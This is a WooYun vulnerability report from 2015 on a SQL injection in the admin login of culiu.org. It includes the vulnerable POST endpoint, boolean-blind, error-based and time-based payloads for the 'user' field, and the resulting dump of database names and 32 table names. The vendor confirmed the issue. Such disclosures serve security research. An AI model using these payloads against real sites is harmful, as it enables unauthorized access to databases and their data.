乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-16: 厂商已经确认,细节仅向厂商公开 2015-09-26: 细节向核心白帽子及相关领域专家公开 2015-10-06: 细节向普通白帽子公开 2015-10-16: 细节向实习白帽子公开 2015-10-31: 细节向公众公开
主站管理后台。。。
不小心把测试字符输错了,少了个and,竟然报错了。发现有问题,搞串http://www.culiu.org:80/admin/index.php/login/check/time-1441967217-ajax-true (POST)password=wy123456&user=1
---Parameter: user (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: password=wy123456&user=-5686" OR 1559=1559 AND "pTCX"="pTCX Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: password=wy123456&user=1" AND (SELECT 7115 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(7115=7115,1))),0x7162706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "GBMc"="GBMc Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: password=wy123456&user=1" AND (SELECT * FROM (SELECT(SLEEP(5)))Vgly) AND "bidc"="bidc---web application technology: Nginxback-end DBMS: MySQL 5.0current user: 'culiuorg@%'current user is DBA: Falseavailable databases [3]:[*] culiuorg[*] information_schema[*] testDatabase: culiuorg[32 tables]+-----------------------+| dc_admin || dc_admin_group || dc_admin_log || dc_admin_menu || dc_admin_power || dc_category || dc_category_jump || dc_category_page || dc_content || dc_content_data || dc_expand_content_cp || dc_expand_model || dc_expand_model_field || dc_form || dc_form_data_hdp || dc_form_data_yqlj || dc_form_field || dc_fragment || dc_lang || dc_model || dc_plugin || dc_position || dc_position_relation || dc_replace || dc_tags || dc_tags_category || dc_tags_relation || dc_upload || dc_upload_category || dc_upload_content || dc_upload_form || dc_upload_plus |+-----------------------+
md5没解出来。。。。。就不深入了。貌似你们有安全测试和监控。得查查
危害等级:高
漏洞Rank:20
确认时间:2015-09-16 21:10
感谢反馈
暂无